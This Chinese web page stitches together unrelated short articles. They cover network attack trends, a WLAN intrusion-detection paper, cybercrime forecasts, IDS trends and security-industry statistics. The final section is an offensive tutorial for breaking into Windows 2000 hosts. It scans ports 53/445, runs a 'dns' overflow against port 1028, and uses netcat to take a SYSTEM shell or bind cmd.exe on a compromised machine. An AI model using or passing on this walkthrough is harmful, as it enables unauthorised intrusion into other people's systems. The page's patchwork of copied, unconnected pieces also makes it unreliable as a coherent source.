本文目录一览:
- 1、网络攻击的发展趋势
- 2、浅析局域网网络入侵检测技术
- 3、网络犯罪的趋势
- 4、入侵检测技术的发展趋势
- 5、网络安全未来发展趋势怎么样?
- 6、如何利用dns漏洞入侵
网络攻击的发展趋势
在最近几年里,网络攻击技术和攻击工具有了新的发展趋势,使借助Internet运行业务的机构面临着前所未有的风险,本文将对网络攻击的新动向进行分析,使读者能够认识、评估,并减小这些风险。
越来越不对称的威胁
Internet上的安全是相互依赖的。每个Internet系统遭受攻击的可能性取决于连接到全球Internet上其他系统的安全状态。由于攻击技术的进步,一个攻击者可以比较容易地利用分布式系统,对一个受害者发动破坏性的攻击。随着部署自动化程度和攻击工具管理技巧的提高,威胁将继续增加。
攻击工具越来越复杂
攻击工具开发者正在利用更先进的技术武装攻击工具。与以前相比,攻击工具的特征更难发现,更难利用特征进行检测。攻击工具具有三个特点:反侦破,攻击者采用隐蔽攻击工具特性的技术,这使安全专家分析新攻击工具和了解新攻击行为所耗费的时间增多;动态行为,早期的攻击工具是以单一确定的顺序执行攻击步骤,今天的自动攻击工具可以根据随机选择、预先定义的决策路径或通过入侵者直接管理,来变化它们的模式和行为;攻击工具的成熟性,与早期的攻击工具不同,攻击工具可以通过升级或更换工具的一部分迅速变化,发动迅速变化的攻击,且在每一次攻击中会出现多种不同形态的攻击工具。此外,攻击工具越来越普遍地被开发为可在多种操作系统平台上执行。许多常见攻击工具使用IRC或HTTP(超文本传输协议)等协议,从入侵者那里向受攻击的计算机发送数据或命令,使得人们将攻击特性与正常、合法的网络传输流区别开变得越来越困难。
发现安全漏洞越来越快
网络攻击 新发现的安全漏洞每年都要增加一倍,管理人员不断用最新的补丁修补这些漏洞,而且每年都会发现安全漏洞的新类型。入侵者经常能够在厂商修补这些漏洞前发现攻击目标。
防火墙渗透率越来越高
防火墙是人们用来防范入侵者的主要保护措施。但是越来越多的攻击技术可以绕过防火墙,例如,IPP(Internet打印协议)和WebDAV(基于Web的分布式创作与翻译)都可以被攻击者利用来绕过防火墙。
自动化和攻击速度提高
攻击工具的自动化水平不断提高。自动攻击一般涉及四个阶段,在每个阶段都出现了新变化。扫描可能的受害者。自1997年起,广泛的扫描变见惯。扫描工具利用更先进的扫描模式来改善扫描效果和提高扫描速度。损害脆弱的系统。以前,安全漏洞只在广泛的扫描完成后才被加以利用。而攻击工具利用这些安全漏洞作为扫描活动的一部分,从而加快了攻击的传播速度。传播攻击。在2000年之前,攻击工具需要人来发动新一轮攻击。攻击工具可以自己发动新一轮攻击。像红色代码和尼姆达这类工具能够自我传播,在不到18个小时内就达到全球饱和点。攻击工具的协调管理。随着分布式攻击工具的出现,攻击者可以管理和协调分布在许多Internet系统上的大量已部署的攻击工具。分布式攻击工具能够更有效地发动拒绝服务攻击,扫描潜在的受害者,危害存在安全隐患的系统。
对基础设施威胁增大
基础设施攻击是大面积影响Internet关键组成部分的攻击。由于用户越来越多地依赖Internet完成日常业务,基础设施攻击引起人们越来越大的担心。基础设施面临分布式拒绝服务攻击、蠕虫病毒、对Internet域名系统(DNS)的攻击和对路由器攻击或利用路由器的攻击。
拒绝服务攻击利用多个系统攻击一个或多个受害系统,使受攻击系统拒绝向其合法用户提供服务。攻击工具的自动化程度使得一个攻击者可以安装他们的工具并控制几万个受损害的系统发动攻击。入侵者经常搜索已知包含大量具有高速连接的易受攻击系统的地址块,电缆调制解调器、DSL和大学地址块越来越成为计划安装攻击工具的入侵者的目标。由于Internet是由有限而可消耗的资源组成,并且Internet的安全性是高度相互依赖的,因此拒绝服务攻击十分有效。蠕虫病毒是一种自我繁殖的恶意代码。与需要用户做某种事才能继续繁殖的病毒不同,蠕虫病毒可以自我繁殖。再加上它们可以利用大量安全漏洞,会使大量的系统在几个小时内受到攻击。一些蠕虫病毒包括内置的拒绝服务攻击载荷或Web站点损毁载荷,另一些蠕虫病毒则具有动态配置功能。但是,这些蠕虫病毒的最大影响力是,由于它们传播时生成海量的扫描传输流,它们的传播实际上在Internet上生成了拒绝攻击,造成大量间接的破坏(这样的例子包括:DSL路由器瘫痪;并非扫描本身造成的而是扫描引发的基础网络管理(ARP)传输流激增造成的电缆调制解制器ISP网络全面超载)。
美军发展网络攻击武器
据防务新闻网站2012年10月4日报道,一名军方官员表示,美国需要发展网络空间攻击性武器,以保护国家免受网络攻击。
美国网络司令部司令兼美国国家安全局局长基思·亚历山大表示,“如果防御仅仅是在尽力阻止攻击,那么这永远不算成功。政府需要在攻击发生之前将其扼杀,采取何种防御措施部分归因于攻击手段。”
亚历山大在美国商会举办的网络安全峰会上表示,任何赛博攻击行为都需要遵循其它军事态势 中相似的交战原则。
美国军方已经开始研究包括攻击型武器在内的各种网络空间策略。DARPA则开始为网络空间攻击能力构建平台,并经呼吁学术界和工业界的专家参与。
浅析局域网网络入侵检测技术
说实话这种东西要写也写得出来,不过把时间浪费在论文上和上课睡觉是一个道理,复制的吧。
随着无线技术和网络技术发展无线网络正成为市场热点其中无线局域网(WLAN)正广泛应用于大学校园、各类展览会、公司内部乃至家用网络等场合但是由于无线网络特殊性攻击者无须物理连线就可以对其进行攻击使WLAN问题显得尤为突出对于大部分公司来说WLAN通常置于后黑客旦攻破就能以此为跳板攻击其他内部网络使防火墙形同虚设和此同时由于WLAN国家标准WAPI无限期推迟IEEE 802.11网络仍将为市场主角但因其认证机制存在极大安全隐患无疑让WLAN安全状况雪上加霜因此采用入侵检测系统(IDS——rusion detection system)来加强WLAN安全性将是种很好选择尽管入侵检测技术在有线网络中已得到认可但由于无线网络特殊性将其应用于WLAN尚需进步研究本文通过分析WLAN特点提出可以分别用于有接入点模式WLAN和移动自组网模式WLAN两种入侵检测模型架构
上面简单描述了WLAN技术发展及安全现状本文主要介绍入侵检测技术及其应用于WLAN时特殊要点给出两种应用于区别架构WLAN入侵检测模型及其实用价值需要介绍说明是本文研究入侵检测主要针对采用射频传输IEEE802.11a/b/g WLAN对其他类型WLAN同样具有参考意义
1、WLAN概述
1.1 WLAN分类及其国内外发展现状
对于WLAN可以用区别标准进行分类根据采用传播媒质可分为光WLAN和射频WLAN光WLAN采用红外线传输不受其他通信信号干扰不会被穿透墙壁偷听而早发射器功耗非常低;但其覆盖范围小漫射方式覆盖16m仅适用于室内环境最大传输速率只有4 Mbit/s通常不能令用户满意由于光WLAN传送距离和传送速率方面局限现在几乎所有WLAN都采用另种传输信号——射频载波射频载波使用无线电波进行数据传输IEEE 802.11采用2.4GHz频段发送数据通常以两种方式进行信号扩展种是跳频扩频(FHSS)方式另种是直接序列扩频(DSSS)方式最高带宽前者为3 Mbit/s后者为11Mbit/s几乎所有WLAN厂商都采用DSSS作为网络传输技术 根据WLAN布局设计通常分为基础结构模式WLAN和移动自组网模式WLAN两种前者亦称合接入点(AP)模式后者可称无接入点模式分别如图1和图2所示
图1 基础结构模式WLAN
图2 移动自组网模式WLAN
1.2 WLAN中安全问题 WLAN流行主要是由于它为使用者带来方便然而正是这种便利性引出了有线网络中不存在安全问题比如攻击者无须物理连线就可以连接网络而且任何人都可以利用设备窃听到射频载波传输广播数据包因此着重考虑安全问题主要有:
a)针对IEEE 802.11网络采用有线等效保密(WEP)存在漏洞进行破解攻击
b)恶意媒体访问控制(MAC)地址伪装这种攻击在有线网中同样存在
C)对于含AP模式攻击者只要接入非授权假冒AP就可登录欺骗合法用户
d)攻击者可能对AP进行泛洪攻击使AP拒绝服务这是种后果严重攻击方式此外对移动自组网模式内某个节点进行攻击让它不停地提供服务或进行数据包转发使其能源耗尽而不能继续工作通常称为能源消耗攻击
e)在移动自组网模式局域网内可能存在恶意节点恶意节点存在对网络性能影响很大
2、入侵检测技术及其在WLAN中应用
IDS可分为基于主机入侵检修系统(HIDS)和基于网络入侵检测系统(NIDS)HIDS采用主机上文件(特别是日志文件或主机收发网络数据包)作为数据源HIDS最早出现于20世纪80年代初期当时网络拓扑简单入侵相当少见因此侧重于对攻击事后分析现在HIDS仍然主要通过记录验证只不过自动化程度提高且能做到精确检测和快速响应并融入文件系统保护和监听端口等技术和HIDS区别NIDS采用原始网络数据包作为数据源从中发现入侵迹象它能在不影响使用性能情况下检测入侵事件并对入侵事件进行响应分布式网络IDS则把多个检测探针分布至多个网段最后通过对各探针发回信息进行综合分析来检测入侵这种结构优点是管理起来简单方便单个探针失效不会导致整个系统失效但配置过程复杂基础结构模式入侵检测模型将采用这种分布式网络检测思路方法而对于移动自组网模式内入侵检测模型将采用基于主机入侵检测模型
当前对WLAN入侵检测大都处于试验阶段比如开源入侵检测系统Snort发布Snort-wire-less测试版增加了Wi字段和选项关键字采用规则匹配思路方法进行入侵检测其AP由管理员手工配置因此能很好地识别非授权假冒AP在扩展AP时亦需重新配置但是由于其规则文件无有效规则定义使检测功能有限而且不能很好地检测MAC地址伪装和泛洪拒绝服务攻击2003年下半年IBM提出WLAN入侵检测方案采用无线感应器进行监测该方案需要联入有线网络应用范围有限而且系统成本昂贵要真正市场化、实用化尚需时日此外作为概念模型设计WIDZ系统实现了AP监控和泛洪拒绝服务检测但它没有个较好体系架构存在局限性
在上述基础上我们提出种基于分布式感应器网络检测模型框架对含AP模式WLAN进行保护对于移动自组网模式WLAN则由于网络中主机既要收发本机数据又要转发数据(这些都是加密数据)文献提出了采用异常检测法对表更新异常和其他层活动异常进行检测但只提供了模型没有实现此外我们分析了移动自组网模式中恶意节点对网络性能影响并提出种基于声誉评价机制安全以检测恶意节点并尽量避开恶意节点进行选择其中恶意节点检测思想值得借鉴Snort-wireless可以作为基于主机入侵检测我们以此为基础提出种应用于移动自组网入侵检测基于主机入侵检测模型架构
3、WLAN中入侵检测模型架构
在含AP模式中可以将多个WLAN基本服务集(BSS)扩展成扩展服务集(ESS)甚至可以组成个大型WLAN这种网络需要种分布式检测框架由中心控制台和监测代理组成如图3所示
图3 含AP模式分布式入侵检测系统框架
网络管理员中心控制台配置检测代理和浏览检测结果并进行关联分析监测代理作用是监听无线数据包、利用检测引擎进行检测、记录警告信息并将警告信息发送至中心控制台
由此可见监测代理是整个系统核心部分根据网络布线和否监测代理可以采用两种模式:种是使用1张无线网卡再加1张以大网卡无线网卡设置成“杂凑”模式监听所有无线数据包以太网卡则用于和中心通信;另种模式是使用2张无线网卡其中张网卡设置成“杂凑”模式另张则和中心通信
分组捕获完成后将信息送至检测引擎进行检测目前最常用IDS主要采用检测思路方法是特征匹配即把网络包数据进行匹配看是否有预先写在规则中“攻击内容”或特征尽管多数IDS匹配算法没有公开但通常都和著名开源入侵检测系统Snort多模检测算法类似另些IDS还采用异常检测思路方法(如Spade检测引擎等)通常作为种补充方式无线网络传输是加密数据因此该系统需要重点实现部分由非授权AP检测通常发现入侵的后监测代理会记录攻击特征并通过安全通道(采用定强度加密算法加密有线网络通常采用安全套接层(SSL)协议无线网络通常采用无线加密协议(WEP))将告警信息发给中心控制台进行显示和关联分析等并由控制台自动响应(告警和干扰等)或由网络管理员采取相应措施
在移动自组网模式中每个节点既要收发自身数据又要转发其他节点数据而且各个节点传输范围受到限制如果在该网络中存在或加入恶意节点网络性能将受到严重影响恶意节点攻击方式可以分为主动性攻击和自私性攻击主动性攻击是指节点通过发送路由信息、伪造或修改路由信息等方式对网络造成干扰;自私性攻击是指网络中部分节点可能因资源能量和计算能量等缘故不愿承担其他节点转发任务所产生干扰因此对恶意节点检测并在相应路由选择中避开恶意节点也是该类型WLAN需要研究问题
我们检测模型建立在HIDS上甚至可以实现路由协议中部分安全机制如图4所示
图4 移动自组网模式中入侵检测架构
当数据包到达主机后如果属于本机数据数据包将被解密在将它递交给上层的前先送至基于主机误用检测引擎进行检测根据检测结果对正常数据包放行对攻击数据包则进行记录并根据响应策略进行响应此外还可以在误用检测模型基础上辅以异常检测引擎根据以往研究成果可以在网络层或应用层上进行也可以将其做入路由协议中以便提高检测速度和检测效率
4、结束语
传统入侵检测系统已不能用于WLAN而WLAN内入侵检测系统研究和实现才刚刚起步本文分析了WLAN特点及其存在安全问题提出了两种入侵检测系统架构可以分别用于基础结构模式WLAN和移动自组网模式WLAN具有实用价值基础结构模式WLAN采用分布式网络入侵检测可用于大型网络;移动自组网中采用基于主机入侵检测系统用于检测异常节点活动和发现恶
网络犯罪的趋势
移动装置将成为跨平台威胁的新目标
网络犯罪者瞄准的三大移动平台包括Windows 8、Android和iOS.Web-based跨平台攻击将更容易发生。Microsoft移动装置威胁在2013将呈现最高成长率。网络犯罪者就如同合法的应用开发者,把心力聚焦于最有利润的平台。随着开发障碍因素的移除,移动威胁将可以运用庞大的共享链接库。并且,攻击者也将继续加重利用社交工程以窃取移动装置的用户数据。
网络犯罪利用绕道避免sandbox侦测
越来越多组织利用虚拟机防护技术,以测试恶意软件和威胁。因此,攻击者也采取新的步骤以避免被虚拟机环境侦测。有些潜在的方法会尝试辨识安全沙盒(sandbox),就如同以往的攻击把目标锁定在特定的防毒引擎并且关闭它们的功能。这些进阶的攻击将维持隐匿状态,直到它们确定本身并非处在一个虚拟安全环境。
App stores将隐含更多恶意软件
越来越多恶意App将躲过验证程序。它们将继续对那些实施员工携带自有装置(Bring Your Own Device;BYOD)政策的组织构成威胁。此外,越狱(jail-broken)或者取得root权限的装置以及未规范保护的App stores等,将对越来越多实施BYOD的企业形成严重的风险。
赞助的攻击将随着新手的加入而更加猖獗
预期将有更多政府投入因特网战争。在发生数次已公开的因特网战争之后,有诸多因素将促使更多国家实行这些战略与战术。尽管要成为另一个核武强权或许困难重重,但几乎任何国家都可以汇集人才与资源以发展因特网武器。国家和个人网络犯罪者都将能取得先前由国家赞助的攻击蓝图,例如Stuxnet、Flame和Shamoon.
黑客们将朝新而复杂的技术发展
近几年来发生的一些高知名度黑客事件,已促使企业组织部署越来越强的侦测与预防政策、方案和策略。因此,黑客们将朝新而复杂的技术发展。
恶意电子邮件回来了
具有时效和针对性的鱼叉式网络钓鱼(spear-phishing)电子邮件攻击以及恶意附件的增加,为网络犯罪提供新的机会。恶意邮件将再掀风暴。网域产生(domain generation)技术也将绕过现有的安全防护,提高针对性攻击的有效性。
网络犯罪将侵入内容管理系统和Web平台
WordPress的安全弱点经常遭大量攻击入侵。随着其他内容管理系统(Content Management Systems;CMS)与服务平台的普及,网络犯罪者将频繁的测试这些系统的安全性。攻击活动将继续侵入合法Web平台,促使CMS管理者必须更加重视更新、补丁和其他安全措施。网络犯罪者侵入这些平台的目的是为了植入他们的恶意软件,感染用户和入侵组织以窃取数据。
入侵检测技术的发展趋势
对分析技术加以改进:采用当前的分析技术和模型,会产生大量的误报和漏报,难以确定真正的入侵行为。采用协议分析和行为分析等新的分析技术后,可极大地提高检测效率和准确性,从而对真正的攻击做出反应。协议分析是目前最先进的检测技术,通过对数据包进行结构化协议分析来识别入侵企图和行为,这种技术比模式匹配检测效率更高,并能对一些未知的攻击特征进行识别,具有一定的免疫功能;行为分析技术不仅简单分析单次攻击事件,还根据前后发生的事件确认是否确有攻击发生、攻击行为是否生效,是入侵检测技术发展的趋势。
增进对大流量网络的处理能力:随着网络流量的不断增长,对获得的数据进行实时分析的难度加大,这导致对所在入侵检测系统的要求越来越高。入侵检测产品能否高效处理网络中的数据是衡量入侵检测产品的重要依据。
向高度可集成性发展:集成网络监控和网络管理的相关功能。入侵检测可以检测网络中的数据包,当发现某台设备出现问题时,可立即对该设备进行相应的管理。未来的入侵检测系统将会结合其它网络管理软件,形成入侵检测、网络管理、网络监控三位一体的工具。
1. 基于agent(注:代理服务)的分布协作式入侵检测与通用入侵检测结合
2. 入侵检测标准的研究, 目前缺乏统一标准
3. 宽带高速网络实时入侵检测技术
4. 智能入侵检测
5. 入侵检测的测度
网络安全未来发展趋势怎么样?
网络安全态势紧张,网络安全事件频发
据国家互联网应急中心(CNCERT),2019年上半年,CNCERT新增捕获计算机恶意程序样本数量约3200万个,计算机恶意程序传播次数日均达约998万次,CNCERT抽样监测发现,2019年上半年我国境内峰值超过10Gbps的大流量分布式拒绝服务攻击(DDoS攻击)事件数量平均每月约4300起,同比增长18%;国家信息安全漏洞共享平台(CNVD)收录通用型安全漏洞5859个。网站安全方面,2019年上半年,CNCERT自主监测发现约4.6万个针对我国境内网站的仿冒页面,境内外约1.4万个IP地址对我国境内约2.6万个网站植入后门,同比增长约1.2倍,可见我国网络安全态势紧张。
2019年上半年,发生在我国网络安全事件和威胁情况进一步加剧,各类网络安全事件数量占比仍然较高。2019年我国比较典型的网络安全事件包括:2019年3月,境外黑客利用勒索病毒攻击部分政府和医院机构;华为起诉美国政府,称其涉嫌入侵华为服务器;
2019 年1月,超2亿的中国求职者简历泄露,不受保护状态持续一周等;在国家层面上,2019年两会期间,政府工作报告也多次提及信息安全。
网络安全威胁推动行业发展,网络安全行业规模有望超700亿
“十三五”以来,我国网络安全产业保持高速增长,2019年产业规模超过600亿元,年增长率超过20%,明显高于国际8%的平均增数,保持健康的发展态势。
网络安全融资再创新高,有望突破100亿
鉴于网络安全行业的良好发展前景,网络安全行业不断受到资本的青睐,我国网络安全融资金额屡创新高。2015-2019年,中国网络安全行业融资事件虽然从最高的58件下降至38件,但是融资金额却再创新高,2019年达到96.99亿元,较上一年增长约70%。2020年有望突破100亿元。
2020年,我国网络安全融资持续发生,
2020年3月,业务安全公司人人云图获得5000万A轮融资;网络安全服务商易安联获得近亿元的A+轮融资,云端安全服务提供商Netskope获得3.4亿美元的融资等。
网络安全行业的发展短期内是通过频繁出现的安全事件驱动,短中期离不开国家政策合规,中长期则是通过信息化、云计算、万物互联等基础架构发展驱动。2020年网络安全领域将进一步迎来网络安全合规政策及安全事件催化,例如自2020年1月1日起施行《中华人民共和国密码法》,2020年3月1日起施行《网络信息内容生态治理规定》等。2020年作为
“十三五”收官之年,将陆续开始编制网络安全十四五规划。在各种因素的驱动下,2020年我国网络安全行业将得到进一步发展。
——以上数据来源于前瞻产业研究院《中国网络安全行业发展前景预测与投资战略规划分析报告》。
如何利用dns漏洞入侵
前提是必须要开放53、445端口 1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描。
2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,“1028 :Vulnerability”表示
1028端口存在溢出漏洞,“os:window 2000”表示系统类型为window 2000。
3、在执行dns -t 2000all ip 1028 对目标主机进行溢出。connection to target host tcp port established 成功连接到主机的tcp端口上,
successfully bound to the vulnerale dcerpc interface 已经连接到对方的rpc端口上,os fingerprint result:windows 2000
系统指纹鉴定对方是wind2000系统,attack sent,check port 1100 攻击代码已经成功发送,并尝试连接1100端口。当出现最后这一句
提示语句的时候就意味着我们要成功了。
4、怎么连接对方的1100端口呢,当然我们要使用nc了。
5、nc全称叫"netcat",这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的“瑞士军刀”。下面介绍一下它的几个常用功能
1、nc.exe -vv -l -p 6069,表示在本地6069端口上进行监听。-vv:显示详细的信息。-l:进行监听,监听入站信息。-p:监听所使用的
端口号。
2、正如我们遇到的情况,对方已经开放了一个端口。他在等待我们连接哦,连接上去会有什么呢?当然是system权限的shell了。
nc.exe -vv 127.0.0.1 5257,连接ip为127.0.0.1的5257端口。
3、还可以在本地监听端口的同时绑定shell,就相当于一个telnet服务端。通常这个命令在肉鸡上执行,然后当我们连接上去就可以获得
这个shell了。nc.exe -l -p 5257 -t -e cmd.exe,在本机5257端口上监听并绑定cmd.exe。-e 作用就是程序定向。-t以telnet的形式
来应答。
4、它可以用来手动对主机提交数据包(通常为80)端口,nc.exe -vv 127.0.0.1 80 yan.txt,往ip为127.0.0.1的80端口提交yan.txt中
的内容。
6、介绍完nc.exe的四种常用方式,现在知道如何使用nc来链接对方的1100端口了吧,我们使用nc -vv 127.0.0.1 1100 连接对方的1100端口,
成功获得了一个具有system权限的cmdshell,现在想干什么就干什么了。